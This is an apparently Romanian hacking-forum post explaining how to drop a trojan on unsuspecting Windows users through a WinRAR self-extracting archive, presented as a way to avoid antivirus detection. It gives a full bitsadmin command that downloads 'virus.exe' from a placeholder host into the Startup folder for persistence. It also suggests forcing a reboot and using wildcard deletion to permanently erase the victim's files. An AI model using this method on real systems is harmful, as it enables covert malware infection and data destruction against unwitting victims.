Jump to content

[Windows] Drop Trojan To Unsuspecting

Recommended Posts

Posted (edited)

In primul rand va spun ca nu am avut timp de cercetat daca mai exista pe net metoda asta, eu tocmai ce am descoperit-o jucandu-ma prin winrar. Partea buna e ca nu ai treaba cu antivirusurile cu aceasta metoda de "livrare". Testat pe Windows 7 x64, dar cred ca merge adaptata si pe alte versiuni de Windows.

Aditional se poate seta sa se inchida automat PC-ul victimei dupa extract, pentru a porni imediat virusul, cu toate ca nu recomand. Ce nu am incercat este sa ii pun atribut "hidden" la payload, sa vad daca se tranfera cu tot cu atributii in startup.

Mai este o optiune sa setezi SFX sa stearga anumite fisiere din directorul unde va fi dezarhivat. Aceasta optiune o poti folosi daca vrei sa-i stergi victimei anumite fisiere. Merge cu wildcard, gen daca pui * sterge toate fisierele din directorul unde este setat sa se extraga, partea buna e ca nu se duc in recycle bin, ci se sterg "de tot".

codul folosit este:

cmd /c "bitsadmin /transfer download  /download /priority normal http://SiteulTau.tld/virus.exe "%userprofile%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\virus.exe""

Edited by yo20063

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Create New...